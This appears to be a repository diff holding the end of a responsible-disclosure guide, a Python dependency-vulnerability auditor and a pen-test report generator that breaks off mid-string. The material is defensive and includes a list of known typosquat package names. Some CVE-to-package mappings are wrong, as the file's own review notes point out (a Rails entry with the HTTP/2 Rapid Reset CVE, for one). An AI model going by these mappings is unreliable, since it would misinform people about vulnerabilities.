Dear Security Team,
I am following up on the security vulnerability report I submitted on [DATE] regarding [Brief Title].
I have not yet received an acknowledgment. Could you please confirm receipt and provide an estimated timeline for review?
For reference, my original report is included below / attached.
I remain available to provide additional details or clarification.
Best regards,
[Your Name]
```
### Status Update Request (Day 30)
```
Subject: Re: Security Vulnerability Report — [Brief Title] (30-Day Update Request)
Dear Security Team,
It has been 30 days since I reported the [vulnerability type] in [component]. I would appreciate an update on:
1. Has the vulnerability been confirmed?
2. What is the remediation timeline?
3. Is there anything I can do to assist?
As noted in my original report, I follow a 90-day disclosure policy. The current disclosure date is [DATE].
Best regards,
[Your Name]
```
### Pre-Disclosure Notification (Day 80)
```
Subject: Re: Security Vulnerability Report — [Brief Title] (Pre-Disclosure Notice)
Dear Security Team,
This is a courtesy notice that the 90-day disclosure window for [vulnerability] will close on [DATE].
Current status as I understand it: [summarize last known status].
If a fix is not yet available, I recommend:
- Publishing a security advisory acknowledging the issue
- Providing mitigation guidance to affected users
- Communicating a realistic remediation timeline
I am willing to:
- Extend the deadline by [X] days if you can provide a concrete remediation date
- Review the patch before public release
- Coordinate joint disclosure
Please respond by [DATE - 5 days] so we can align on the disclosure approach.
Best regards,
[Your Name]
```
### Public Disclosure Statement
```
# Security Advisory: [Title]
**Reported:** [Date]
**Disclosed:** [Date]
**Vendor:** [Vendor Name]
**Status:** [Fixed in version X.Y.Z / Unpatched / Mitigated]
## Summary
[Brief description accessible to non-technical readers.]
## Technical Details
[Full technical description, reproduction steps, evidence.]
## Impact
[What could be exploited and the blast radius.]
## Timeline
| Date | Event |
|------|-------|
| [Date] | Vulnerability discovered |
| [Date] | Report submitted to vendor |
| [Date] | Vendor acknowledged |
| [Date] | Fix released (version X.Y.Z) |
| [Date] | Public disclosure |
## Remediation
[Steps users should take — update to version X, apply config change, etc.]
## Credit
Discovered by [Your Name] ([Organization]).
```
---
## Legal Considerations
### Before You Test
1. **Written authorization is required.** For external testing, obtain a signed rules-of-engagement document or scope-of-work. For bug bounty programs, the program's terms of service serve as authorization.
2. **Understand local laws.** The Computer Fraud and Abuse Act (CFAA) in the US, the Computer Misuse Act in the UK, and equivalent laws in other jurisdictions criminalize unauthorized access. Authorization is your legal shield.
3. **Stay within scope.** If the bug bounty program says "*.example.com only," do not test anything outside that scope. If your pen test contract covers the web application, do not pivot to internal networks.
4. **Document everything.** Keep timestamped records of all testing activities: what you tested, when, what you found, and what you did not do (e.g., "did not access real user data").
### During Testing
1. **Do not access real user data.** Use your own test accounts. If you accidentally access real data, stop immediately, document the incident, and report it to the vendor.
2. **Do not cause damage.** No data destruction, no denial-of-service, no resource exhaustion. If a test might cause disruption, get explicit approval first.
3. **Do not exfiltrate data.** Demonstrate the vulnerability with minimal proof. A screenshot showing "1000 records returned" is sufficient — downloading the records is not.
4. **Do not install backdoors.** Even for "maintaining access during testing." If you need persistent access, work with the vendor's team.
### During Disclosure
1. **Do not threaten.** Disclosure timelines are industry practice, not ultimatums. Communicate professionally.
2. **Do not sell vulnerability details.** Selling to exploit brokers instead of reporting to the vendor is irresponsible and may be illegal.
3. **Give vendors reasonable time.** 90 days is standard. Complex architectural fixes may need more time if the vendor is communicating and making progress.
4. **Do not publicly disclose details that help attackers exploit unpatched systems.** If the fix is not yet deployed, disclose the existence and severity of the issue without full exploitation details.
---
## Bug Bounty Program Integration
### Finding the Right Program
1. **Check the vendor's website:** Look for `/security`, `/.well-known/security.txt`, or a security page
2. **Bug bounty platforms:** HackerOne, Bugcrowd, Intigriti, YesWeHack
3. **No program?** Report to `security@[vendor].com` or use CERT/CC as an intermediary
### Bug Bounty Best Practices
1. **Read the entire policy** before testing — scope, exclusions, safe harbor
2. **Test only in-scope assets** — out-of-scope findings may not be rewarded and could be legally risky
3. **Report one vulnerability per submission** — do not bundle unrelated issues
4. **Provide clear reproduction steps** — assume the reader cannot read your mind
5. **Do not duplicate** — search existing reports before submitting
6. **Be patient** — triage can take days to weeks depending on program volume
7. **Do not publicly disclose** until the program explicitly permits it
### If No Bug Bounty Exists
1. Report directly to `security@[vendor].com`
2. If no response after 14 days, try CERT/CC (https://www.kb.cert.org/vuls/report/)
3. Follow the standard disclosure timeline
4. Do not expect payment — responsible disclosure is an ethical practice, not a paid service
---
## CVE Request Process
### When to Request a CVE
- The vulnerability affects publicly available software
- The vendor has confirmed the issue
- A fix is available or will be available soon
### How to Request
1. **Through the vendor:** If the vendor is a CNA (CVE Numbering Authority), they will assign the CVE
2. **Through MITRE:** If the vendor is not a CNA, submit a request at https://cveform.mitre.org/
3. **Through a CNA:** Some platforms (HackerOne, GitHub) are CNAs and can assign CVEs for vulnerabilities in their scope
### Information Required
```
- Vulnerability type (CWE ID if known)
- Affected product and version range
- Fixed version (if available)
- Attack vector (network, local, physical)
- Impact (confidentiality, integrity, availability)
- CVSS score and vector string
- Description (one paragraph, technical but readable)
- References (advisory URL, patch commit, bug report)
```
### CVE ID Format
```
CVE-YYYY-NNNNN
Example: CVE-2024-12345
```
After assignment, the CVE will be published in the NVD (National Vulnerability Database) at https://nvd.nist.gov/.
---
## Key Principles Summary
1. **Report first, disclose later.** Always give the vendor a chance to fix the issue before going public.
2. **Minimize impact.** Prove the vulnerability exists without causing damage or accessing real data.
3. **Communicate professionally.** Security is stressful for everyone. Be clear, helpful, and patient.
4. **Document everything.** Timestamps, evidence, communications — protect yourself and the process.
5. **Follow through.** A report without follow-up helps no one. Stay engaged until the issue is resolved.
6. **Credit where due.** Acknowledge the vendor's response (positive or negative) in your disclosure.
7. **Know the law.** Authorization and scope are your legal foundations. Never test without them.

View File

@@ -0,0 +1,455 @@
#!/usr/bin/env python3
"""
Dependency Auditor - Analyze package manifests for known vulnerable patterns.
Table of Contents:
DependencyAuditor - Main class for dependency vulnerability analysis
__init__ - Initialize with manifest path and severity filter
audit() - Run full audit on the manifest
_parse_manifest() - Detect and parse the manifest file
_parse_package_json() - Parse npm package.json
_parse_requirements() - Parse pip requirements.txt
_parse_go_mod() - Parse Go go.mod
_parse_gemfile() - Parse Ruby Gemfile
_check_vulnerabilities() - Check packages against known CVE patterns
_check_risky_patterns() - Detect risky dependency patterns
main() - CLI entry point
Usage:
python dependency_auditor.py --file package.json
python dependency_auditor.py --file requirements.txt --severity high
python dependency_auditor.py --file go.mod --json
"""
import argparse
import json
import os
import re
import sys
from dataclasses import dataclass, asdict, field
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional, Tuple
@dataclass
class Dependency:
    """A single dependency parsed from a package manifest."""
    name: str             # package name as written in the manifest
    version: str          # declared version string as found in the manifest
    ecosystem: str        # npm, pypi, go, rubygems
    is_dev: bool = False  # True for development-only dependencies
@dataclass
class VulnerabilityFinding:
    """A known vulnerability (CVE) match for a dependency."""
    package: str            # affected package name
    installed_version: str  # version declared in the audited manifest
    vulnerable_range: str   # version range the advisory applies to
    cve_id: str             # CVE identifier, e.g. "CVE-2021-23337"
    severity: str  # critical, high, medium, low
    title: str              # short advisory title
    description: str        # advisory summary
    remediation: str        # recommended fix (typically an upgrade)
    cvss_score: float = 0.0  # CVSS base score; 0.0 when not provided
    references: List[str] = field(default_factory=list)  # related advisory links
@dataclass
class RiskyPattern:
    """A risky dependency pattern (not a CVE, but a concern)."""
    package: str         # dependency the pattern was observed on
    pattern_type: str  # pinning, wildcard, deprecated, typosquat
    severity: str        # critical, high, medium, low (same scale as findings)
    description: str     # what was observed
    recommendation: str  # suggested action
class DependencyAuditor:
"""Analyze package manifests for known vulnerable patterns and risky dependencies."""
# Known vulnerable package versions (curated subset of high-profile CVEs).
# Each entry pairs an ecosystem/package with the exclusive upper bound
# ("below") of the vulnerable range plus advisory metadata.
KNOWN_VULNS = [
    {"ecosystem": "npm", "package": "lodash", "below": "4.17.21",
     "cve": "CVE-2021-23337", "severity": "high", "cvss": 7.2,
     "title": "Prototype Pollution in lodash",
     "description": "lodash before 4.17.21 is vulnerable to Command Injection via template function.",
     "remediation": "Upgrade lodash to >=4.17.21"},
    {"ecosystem": "npm", "package": "axios", "below": "1.6.0",
     "cve": "CVE-2023-45857", "severity": "medium", "cvss": 6.5,
     "title": "CSRF token exposure in axios",
     "description": "axios before 1.6.0 inadvertently exposes CSRF tokens in cross-site requests.",
     "remediation": "Upgrade axios to >=1.6.0"},
    {"ecosystem": "npm", "package": "express", "below": "4.19.2",
     "cve": "CVE-2024-29041", "severity": "medium", "cvss": 6.1,
     "title": "Open Redirect in express",
     "description": "express before 4.19.2 allows open redirects via malicious URLs.",
     "remediation": "Upgrade express to >=4.19.2"},
    {"ecosystem": "npm", "package": "jsonwebtoken", "below": "9.0.0",
     "cve": "CVE-2022-23529", "severity": "critical", "cvss": 9.8,
     "title": "Insecure key retrieval in jsonwebtoken",
     "description": "jsonwebtoken before 9.0.0 allows key confusion attacks via secretOrPublicKey.",
     "remediation": "Upgrade jsonwebtoken to >=9.0.0"},
    {"ecosystem": "npm", "package": "minimatch", "below": "3.0.5",
     "cve": "CVE-2022-3517", "severity": "high", "cvss": 7.5,
     "title": "ReDoS in minimatch",
     "description": "minimatch before 3.0.5 is vulnerable to Regular Expression Denial of Service.",
     "remediation": "Upgrade minimatch to >=3.0.5"},
    {"ecosystem": "npm", "package": "tar", "below": "6.1.9",
     "cve": "CVE-2021-37713", "severity": "high", "cvss": 8.6,
     "title": "Arbitrary File Creation in tar",
     "description": "tar before 6.1.9 allows arbitrary file creation/overwrite via symlinks.",
     "remediation": "Upgrade tar to >=6.1.9"},
    {"ecosystem": "pypi", "package": "pillow", "below": "9.3.0",
     "cve": "CVE-2022-45198", "severity": "high", "cvss": 7.5,
     "title": "DoS via crafted image in Pillow",
     "description": "Pillow before 9.3.0 allows denial of service via specially crafted image files.",
     "remediation": "Upgrade Pillow to >=9.3.0"},
    {"ecosystem": "pypi", "package": "django", "below": "4.2.8",
     "cve": "CVE-2023-46695", "severity": "high", "cvss": 7.5,
     "title": "DoS via file uploads in Django",
     "description": "Django before 4.2.8 allows denial of service via large file uploads.",
     "remediation": "Upgrade Django to >=4.2.8"},
    {"ecosystem": "pypi", "package": "flask", "below": "2.3.2",
     "cve": "CVE-2023-30861", "severity": "high", "cvss": 7.5,
     "title": "Session cookie exposure in Flask",
     "description": "Flask before 2.3.2 may expose session cookies on cross-origin redirects.",
     "remediation": "Upgrade Flask to >=2.3.2"},
    {"ecosystem": "pypi", "package": "requests", "below": "2.31.0",
     "cve": "CVE-2023-32681", "severity": "medium", "cvss": 6.1,
     "title": "Proxy-Authorization header leak in requests",
     "description": "requests before 2.31.0 leaks Proxy-Authorization headers on redirects.",
     "remediation": "Upgrade requests to >=2.31.0"},
    {"ecosystem": "pypi", "package": "cryptography", "below": "41.0.0",
     "cve": "CVE-2023-38325", "severity": "high", "cvss": 7.5,
     "title": "NULL dereference in cryptography",
     "description": "cryptography before 41.0.0 has a NULL pointer dereference in PKCS7 parsing.",
     "remediation": "Upgrade cryptography to >=41.0.0"},
    # NOTE(review): CVE-2020-14343 was fixed upstream in PyYAML 5.4; the 6.0.1
    # bound here is broader than the CVE's range — confirm this is intended.
    {"ecosystem": "pypi", "package": "pyyaml", "below": "6.0.1",
     "cve": "CVE-2020-14343", "severity": "critical", "cvss": 9.8,
     "title": "Arbitrary code execution in PyYAML",
     "description": "PyYAML before 6.0.1 allows arbitrary code execution via yaml.load().",
     "remediation": "Upgrade PyYAML to >=6.0.1 and use yaml.safe_load()"},
    {"ecosystem": "go", "package": "golang.org/x/crypto", "below": "0.17.0",
     "cve": "CVE-2023-48795", "severity": "medium", "cvss": 5.9,
     "title": "Terrapin SSH prefix truncation attack",
     "description": "golang.org/x/crypto before 0.17.0 vulnerable to SSH prefix truncation.",
     "remediation": "Upgrade golang.org/x/crypto to >=0.17.0"},
    {"ecosystem": "go", "package": "golang.org/x/net", "below": "0.17.0",
     "cve": "CVE-2023-44487", "severity": "high", "cvss": 7.5,
     "title": "HTTP/2 rapid reset DoS",
     "description": "golang.org/x/net before 0.17.0 vulnerable to HTTP/2 rapid reset attack.",
     "remediation": "Upgrade golang.org/x/net to >=0.17.0"},
    # NOTE(review): CVE-2023-44487 is the HTTP/2 Rapid Reset CVE (see the
    # golang.org/x/net entry above); it does not match the "ReDoS in Rails"
    # title here — verify the correct Rails CVE identifier.
    {"ecosystem": "rubygems", "package": "rails", "below": "7.0.8",
     "cve": "CVE-2023-44487", "severity": "high", "cvss": 7.5,
     "title": "ReDoS in Rails",
     "description": "Rails before 7.0.8 vulnerable to Regular Expression Denial of Service.",
     "remediation": "Upgrade rails to >=7.0.8"},
]
# Known typosquat / malicious package names, keyed by ecosystem.
# NOTE: the capital "I" in "jeIlyfish" is intentional — it reproduces the
# actual PyPI typosquat of "jellyfish", not a typo in this file.
TYPOSQUAT_PACKAGES = {
    "npm": ["crossenv", "event-stream-malicious", "flatmap-stream", "ua-parser-jss",
            "loadsh", "lodashs", "axois", "requets"],
    "pypi": ["python3-dateutil", "jeIlyfish", "python-binance-sdk", "requestss",
             "djago", "flassk", "requets"],
}
def __init__(self, manifest_path: str, severity_filter: str = "low"):
    """Configure the auditor for one manifest file.

    manifest_path: path to the package manifest to audit.
    severity_filter: minimum severity name to report (default "low").
    """
    # Numeric ranks make severity thresholds comparable with >=.
    self.severity_order = {"critical": 4, "high": 3, "medium": 2, "low": 1}
    self.manifest_path = Path(manifest_path)
    self.severity_filter = severity_filter
    # An unrecognized filter name falls back to rank 1 (report everything).
    self.min_severity = self.severity_order.get(severity_filter, 1)
def audit(self) -> Dict:
    """Parse the manifest, run all checks, and assemble the result payload.

    Returns a dict with manifest info, filtered findings, and a severity
    summary; findings below the configured severity floor are dropped.
    """
    deps = self._parse_manifest()
    rank = self.severity_order
    floor = self.min_severity
    # Keep only findings at or above the configured severity floor.
    vuln_findings = [f for f in self._check_vulnerabilities(deps)
                     if rank.get(f.severity, 0) >= floor]
    risky_patterns = [r for r in self._check_risky_patterns(deps)
                      if rank.get(r.severity, 0) >= floor]
    summary = {level: sum(1 for f in vuln_findings if f.severity == level)
               for level in ("critical", "high", "medium", "low")}
    summary["risky_patterns_count"] = len(risky_patterns)
    return {
        "manifest": str(self.manifest_path),
        "ecosystem": deps[0].ecosystem if deps else "unknown",
        "total_dependencies": len(deps),
        "dev_dependencies": sum(1 for d in deps if d.is_dev),
        "vulnerability_findings": vuln_findings,
        "risky_patterns": risky_patterns,
        "summary": summary,
    }
def _parse_manifest(self) -> List[Dependency]:
    """Read the manifest from disk and dispatch to the matching parser.

    Exits the process with status 1 on unreadable files or unknown formats.
    """
    name = self.manifest_path.name.lower()
    try:
        content = self.manifest_path.read_text(encoding="utf-8")
    except (OSError, PermissionError) as e:
        print(f"Error reading {self.manifest_path}: {e}", file=sys.stderr)
        sys.exit(1)
    # The lowercased file name selects the ecosystem-specific parser.
    dispatch = {
        "package.json": self._parse_package_json,
        "requirements.txt": self._parse_requirements,
        "requirements-dev.txt": self._parse_requirements,
        "requirements_dev.txt": self._parse_requirements,
        "go.mod": self._parse_go_mod,
        "gemfile": self._parse_gemfile,
        "gemfile.lock": self._parse_gemfile,
    }
    parser = dispatch.get(name)
    if parser is None:
        print(f"Unsupported manifest type: {name}", file=sys.stderr)
        print("Supported: package.json, requirements.txt, go.mod, Gemfile", file=sys.stderr)
        sys.exit(1)
    return parser(content)
def _parse_package_json(self, content: str) -> List[Dependency]:
    """Parse npm package.json into Dependency records.

    Version specifiers are normalized by stripping range operators
    (e.g. "^1.2.3" -> "1.2.3"); when nothing numeric remains (e.g.
    "latest"), the raw specifier is kept as-is.
    """
    try:
        data = json.loads(content)
    except json.JSONDecodeError as e:
        print(f"Invalid JSON in package.json: {e}", file=sys.stderr)
        sys.exit(1)
    deps = []
    # Runtime deps first, then dev deps — same record shape, different flag.
    for section, dev_flag in (("dependencies", False), ("devDependencies", True)):
        for pkg, spec in data.get(section, {}).items():
            normalized = re.sub(r"[^0-9.]", "", spec).strip(".")
            deps.append(Dependency(name=pkg, version=normalized or spec,
                                   ecosystem="npm", is_dev=dev_flag))
    return deps
def _parse_requirements(self, content: str) -> List[Dependency]:
    """Parse pip requirements.txt into Dependency records.

    Skips blank lines, comments, and option lines (-r, -e, --hash, ...).
    Package names are lowercased; a missing version pin becomes "unknown".
    """
    spec_re = re.compile(r"^([a-zA-Z0-9_.-]+)\s*(?:[=<>!~]+\s*)?([\d.]*)")
    deps = []
    for raw in content.strip().split("\n"):
        entry = raw.strip()
        # entry[0] check covers both '#' comments and '-' option lines.
        if not entry or entry[0] in "#-":
            continue
        parsed = spec_re.match(entry)
        if parsed:
            deps.append(Dependency(name=parsed.group(1).lower(),
                                   version=parsed.group(2) or "unknown",
                                   ecosystem="pypi"))
    return deps
def _parse_go_mod(self, content: str) -> List[Dependency]:
    """Parse Go go.mod into Dependency records.

    Handles both single-line `require x vN` directives and multi-line
    `require ( ... )` blocks. Modules marked `// indirect` are recorded
    with is_dev=True.
    """
    deps = []
    inside_block = False
    for raw in content.strip().split("\n"):
        entry = raw.strip()
        if entry.startswith("require ("):
            inside_block = True
            continue
        if entry == ")":
            inside_block = False
            continue
        if not (inside_block or entry.startswith("require ")):
            continue
        fields = entry.replace("require ", "").strip().split()
        if len(fields) < 2:
            continue
        deps.append(Dependency(
            name=fields[0],
            version=fields[1].lstrip("v"),  # drop Go's leading "v" from semver
            ecosystem="go",
            is_dev="// indirect" in entry,
        ))
    return deps
def _parse_gemfile(self, content: str) -> List[Dependency]:
    """Parse a Ruby Gemfile into Dependency records.

    Only `gem 'name', 'constraint'` lines are recognized; constraint
    operators (~> >= etc.) are stripped, leaving the bare version, and a
    missing constraint becomes "unknown".
    """
    gem_re = re.compile(r'''gem\s+['"]([\w-]+)['"](?:\s*,\s*['"]([^'"]*)['"'])?''')
    deps = []
    for raw in content.strip().split("\n"):
        entry = raw.strip()
        if not entry or entry.startswith("#"):
            continue
        parsed = gem_re.match(entry)
        if not parsed:
            continue
        constraint = parsed.group(2) or "unknown"
        deps.append(Dependency(name=parsed.group(1),
                               version=re.sub(r"[~><=\s]", "", constraint),
                               ecosystem="rubygems"))
    return deps
@staticmethod
def _version_below(installed: str, threshold: str) -> bool:
    """Return True when `installed` sorts strictly below `threshold`.

    Versions are compared numerically, dot component by dot component;
    non-numeric components are ignored and missing components count as 0.
    Returns False when the comparison cannot be made.
    """
    def as_numbers(version: str) -> list:
        # Keep only purely numeric dot components ("1.2.3-beta" -> [1, 2]).
        return [int(part) for part in version.split(".") if part.isdigit()]
    try:
        left = as_numbers(installed)
        right = as_numbers(threshold)
        # NOTE(review): a fully non-numeric version (e.g. "unknown") becomes
        # [] and compares as all-zero, i.e. below any real threshold —
        # presumably a deliberate conservative choice; confirm.
        width = max(len(left), len(right))
        left += [0] * (width - len(left))
        right += [0] * (width - len(right))
        return left < right
    except (ValueError, IndexError):
        return False
def _check_vulnerabilities(self, deps: List[Dependency]) -> List[VulnerabilityFinding]:
    """Match each dependency against the built-in KNOWN_VULNS table.

    A dependency matches when ecosystem and (case-insensitive) name agree
    and its version is below the advisory's fixed version.
    """
    def is_affected(dep, vuln) -> bool:
        return (dep.ecosystem == vuln["ecosystem"]
                and dep.name.lower() == vuln["package"].lower()
                and self._version_below(dep.version, vuln["below"]))

    findings = []
    for dep in deps:
        for vuln in self.KNOWN_VULNS:
            if not is_affected(dep, vuln):
                continue
            findings.append(VulnerabilityFinding(
                package=dep.name,
                installed_version=dep.version,
                vulnerable_range=f"< {vuln['below']}",
                cve_id=vuln["cve"],
                severity=vuln["severity"],
                title=vuln["title"],
                description=vuln["description"],
                remediation=vuln["remediation"],
                cvss_score=vuln.get("cvss", 0.0),
                references=[f"https://nvd.nist.gov/vuln/detail/{vuln['cve']}"],
            ))
    return findings
def _check_risky_patterns(self, deps: List[Dependency]) -> List[RiskyPattern]:
    """Detect risky dependency patterns.

    Applies three heuristics, in order:
      1. known typosquat / malicious package names (critical),
      2. wildcard or unpinned versions (medium),
      3. a dev-only share above 70% of the dependency tree (low).
    """
    patterns = []
    ecosystem = deps[0].ecosystem if deps else "unknown"
    # Check for typosquat packages.
    # Perf fix: build the lowercased lookup set once instead of rebuilding
    # the lowered list on every iteration (was O(deps * typosquats)).
    typosquats = {t.lower() for t in self.TYPOSQUAT_PACKAGES.get(ecosystem, [])}
    for dep in deps:
        if dep.name.lower() in typosquats:
            patterns.append(RiskyPattern(
                package=dep.name,
                pattern_type="typosquat",
                severity="critical",
                description=f"'{dep.name}' is a known typosquat or malicious package name.",
                recommendation="Remove immediately and check for compromised data. Install the legitimate package.",
            ))
    # Check for wildcard/unpinned versions.
    for dep in deps:
        if dep.version in ("*", "latest", "unknown", ""):
            patterns.append(RiskyPattern(
                package=dep.name,
                pattern_type="unpinned",
                severity="medium",
                description=f"'{dep.name}' has an unpinned version ({dep.version}).",
                recommendation="Pin to a specific version to prevent supply chain attacks.",
            ))
    # Check for excessive dev dependencies in production.
    dev_count = len([d for d in deps if d.is_dev])
    total = len(deps)
    if total > 0 and dev_count / total > 0.7:
        patterns.append(RiskyPattern(
            package="(project-level)",
            pattern_type="dev-heavy",
            severity="low",
            description=f"{dev_count}/{total} dependencies are dev-only. Large dev surface increases supply chain risk.",
            recommendation="Review dev dependencies. Remove unused ones. Consider using --production for installs.",
        ))
    return patterns
def format_report_text(result: Dict) -> str:
    """Format an audit() result dict as a human-readable plain-text report.

    Expects the dict shape produced by DependencyAuditor.audit(): manifest
    info, a severity summary, and lists of finding/pattern objects exposing
    the attributes referenced below.
    """
    lines = []
    lines.append("=" * 70)
    lines.append("DEPENDENCY VULNERABILITY AUDIT REPORT")
    lines.append(f"Manifest: {result['manifest']}")
    lines.append(f"Ecosystem: {result['ecosystem']}")
    lines.append(f"Total dependencies: {result['total_dependencies']} ({result['dev_dependencies']} dev)")
    lines.append(f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
    lines.append("=" * 70)
    summary = result["summary"]
    lines.append(f"\nSummary: {summary['critical']} critical, {summary['high']} high, "
                 f"{summary['medium']} medium, {summary['low']} low, "
                 f"{summary['risky_patterns_count']} risky pattern(s)")
    vulns = result["vulnerability_findings"]
    if vulns:
        lines.append(f"\n--- VULNERABILITY FINDINGS ({len(vulns)}) ---\n")
        for v in vulns:
            lines.append(f" [{v.severity.upper()}] {v.package} {v.installed_version}")
            lines.append(f" CVE: {v.cve_id} (CVSS: {v.cvss_score})")
            lines.append(f" {v.title}")
            lines.append(f" Vulnerable: {v.vulnerable_range}")
            lines.append(f" Fix: {v.remediation}")
            lines.append("")
    else:
        lines.append("\nNo known vulnerabilities found in dependencies.")
    risky = result["risky_patterns"]
    if risky:
        lines.append(f"\n--- RISKY PATTERNS ({len(risky)}) ---\n")
        for r in risky:
            # Bug fix: package and pattern type were concatenated with no
            # separator (rendered e.g. "loadshtyposquat"); join with " — ".
            lines.append(f" [{r.severity.upper()}] {r.package} — {r.pattern_type}")
            lines.append(f" {r.description}")
            lines.append(f" Fix: {r.recommendation}")
            lines.append("")
    return "\n".join(lines)
def main():
    """CLI entry point: parse args, run the audit, print text or JSON.

    Exits with status 1 when the file is missing or when critical/high
    vulnerabilities are found (useful for CI gating).
    """
    parser = argparse.ArgumentParser(
        description="Dependency Auditor — Analyze package manifests for known vulnerabilities and risky patterns.",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Supported manifests:
package.json (npm)
requirements.txt (pip/PyPI)
go.mod (Go)
Gemfile (Ruby)
Examples:
%(prog)s --file package.json
%(prog)s --file requirements.txt --severity high
%(prog)s --file go.mod --json
""",
    )
    parser.add_argument("--file", required=True, metavar="PATH",
                        help="Path to package manifest file")
    parser.add_argument("--severity", choices=["low", "medium", "high", "critical"], default="low",
                        help="Minimum severity to report (default: low)")
    parser.add_argument("--json", action="store_true", dest="json_output",
                        help="Output results as JSON")
    args = parser.parse_args()

    if not Path(args.file).exists():
        print(f"Error: File not found: {args.file}", file=sys.stderr)
        sys.exit(1)

    result = DependencyAuditor(manifest_path=args.file, severity_filter=args.severity).audit()

    if args.json_output:
        # Findings are dataclasses; flatten them to plain dicts for JSON.
        payload = {
            "manifest": result["manifest"],
            "ecosystem": result["ecosystem"],
            "total_dependencies": result["total_dependencies"],
            "dev_dependencies": result["dev_dependencies"],
            "summary": result["summary"],
            "vulnerability_findings": [asdict(f) for f in result["vulnerability_findings"]],
            "risky_patterns": [asdict(r) for r in result["risky_patterns"]],
            "generated_at": datetime.now().isoformat(),
        }
        print(json.dumps(payload, indent=2))
    else:
        print(format_report_text(result))

    # Exit non-zero if critical or high vulnerabilities found.
    if result["summary"]["critical"] > 0 or result["summary"]["high"] > 0:
        sys.exit(1)


if __name__ == "__main__":
    main()

View File

@@ -0,0 +1,462 @@
#!/usr/bin/env python3
"""
Pen Test Report Generator - Generate structured penetration testing reports from findings.
Table of Contents:
PentestReportGenerator - Main class for report generation
__init__ - Initialize with findings data
generate_markdown() - Generate markdown report
generate_json() - Generate structured JSON report
_executive_summary() - Build executive summary section
_findings_table() - Build severity-sorted findings table
_detailed_findings() - Build detailed findings with evidence
_remediation_matrix() - Build effort vs. impact remediation matrix
_calculate_risk_score() - Calculate overall risk score
main() - CLI entry point
Usage:
python pentest_report_generator.py --findings findings.json --format md --output report.md
python pentest_report_generator.py --findings findings.json --format json
python pentest_report_generator.py --findings findings.json --format md
"""
import argparse
import json
import sys
from dataclasses import dataclass, asdict, field
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional
@dataclass
class Finding:
    """A single pen test finding."""
    title: str                  # short human-readable finding name
    severity: str  # critical, high, medium, low, info
    cvss_score: float           # CVSS base score, 0.0-10.0
    category: str               # e.g. "A03:2021 - Injection"
    description: str            # what the vulnerability is
    evidence: str               # proof-of-concept request/response or payload
    impact: str                 # consequence if exploited
    remediation: str            # how to fix it
    cvss_vector: str = ""       # optional CVSS v3 vector string
    references: List[str] = field(default_factory=list)  # external links (CWE, advisories)
    effort: str = "medium"  # low, medium, high — remediation effort
# Rank used to sort findings most-severe-first; unknown severities rank 0.
SEVERITY_ORDER = {"critical": 5, "high": 4, "medium": 3, "low": 2, "info": 1}
class PentestReportGenerator:
    """Generate professional penetration testing reports from structured findings."""

    def __init__(self, findings: List[Finding], metadata: Optional[Dict] = None):
        """Store findings sorted most-severe-first and optional report metadata."""
        # Sections below (top-3 list, tables, remediation list) rely on this order.
        self.findings = sorted(findings, key=lambda f: SEVERITY_ORDER.get(f.severity, 0), reverse=True)
        self.metadata = metadata or {}
        # Capture the timestamp once so every section reports the same time.
        self.generated_at = datetime.now().strftime("%Y-%m-%d %H:%M:%S")

    def generate_markdown(self) -> str:
        """Generate a complete markdown pen test report."""
        # Each helper returns one markdown section; join with blank lines.
        sections = []
        sections.append(self._header())
        sections.append(self._executive_summary())
        sections.append(self._scope_section())
        sections.append(self._findings_table())
        sections.append(self._detailed_findings())
        sections.append(self._remediation_matrix())
        sections.append(self._methodology_section())
        sections.append(self._appendix())
        return "\n\n".join(sections)

    def generate_json(self) -> Dict:
        """Generate structured JSON report."""
        return {
            "report_metadata": {
                "title": self.metadata.get("title", "Penetration Test Report"),
                "target": self.metadata.get("target", "Not specified"),
                "tester": self.metadata.get("tester", "Not specified"),
                "date_range": self.metadata.get("date_range", "Not specified"),
                "generated_at": self.generated_at,
                "overall_risk_score": self._calculate_risk_score(),
                "overall_risk_level": self._risk_level(),
            },
            "summary": {
                "total_findings": len(self.findings),
                "critical": len([f for f in self.findings if f.severity == "critical"]),
                "high": len([f for f in self.findings if f.severity == "high"]),
                "medium": len([f for f in self.findings if f.severity == "medium"]),
                "low": len([f for f in self.findings if f.severity == "low"]),
                "info": len([f for f in self.findings if f.severity == "info"]),
            },
            "findings": [asdict(f) for f in self.findings],
            "remediation_priority": self._remediation_priority_list(),
        }

    def _header(self) -> str:
        """Build the report title plus an engagement-metadata markdown table."""
        title = self.metadata.get("title", "Penetration Test Report")
        target = self.metadata.get("target", "Not specified")
        tester = self.metadata.get("tester", "Not specified")
        date_range = self.metadata.get("date_range", "Not specified")
        lines = [
            f"# {title}",
            "",
            "| Field | Value |",
            "|-------|-------|",
            f"| **Target** | {target} |",
            f"| **Tester** | {tester} |",
            f"| **Date Range** | {date_range} |",
            f"| **Report Generated** | {self.generated_at} |",
            f"| **Overall Risk** | {self._risk_level()} (Score: {self._calculate_risk_score():.1f}/10) |",
            f"| **Total Findings** | {len(self.findings)} |",
        ]
        return "\n".join(lines)

    def _executive_summary(self) -> str:
        """Build the executive summary: counts, top-3 findings, risk call-out."""
        critical = len([f for f in self.findings if f.severity == "critical"])
        high = len([f for f in self.findings if f.severity == "high"])
        medium = len([f for f in self.findings if f.severity == "medium"])
        low = len([f for f in self.findings if f.severity == "low"])
        info = len([f for f in self.findings if f.severity == "info"])
        risk_score = self._calculate_risk_score()
        risk_level = self._risk_level()
        lines = [
            "## Executive Summary",
            "",
            f"This penetration test identified **{len(self.findings)} findings** across the target application. "
            f"The overall risk level is **{risk_level}** with a score of **{risk_score:.1f}/10**.",
            "",
            "### Finding Severity Distribution",
            "",
            "| Severity | Count |",
            "|----------|-------|",
            f"| Critical | {critical} |",
            f"| High | {high} |",
            f"| Medium | {medium} |",
            f"| Low | {low} |",
            f"| Informational | {info} |",
        ]
        # Top 3 findings (self.findings is already sorted most-severe-first).
        if self.findings:
            lines.append("")
            lines.append("### Top Priority Findings")
            lines.append("")
            for i, f in enumerate(self.findings[:3], 1):
                # Impact is truncated to 120 chars to keep the summary compact.
                lines.append(f"{i}. **{f.title}** ({f.severity.upper()}, CVSS {f.cvss_score}) — {f.impact[:120]}")
        # Risk assessment call-out based on the worst severity present.
        lines.append("")
        if critical > 0:
            lines.append("> **CRITICAL RISK**: Immediate remediation required. Critical vulnerabilities "
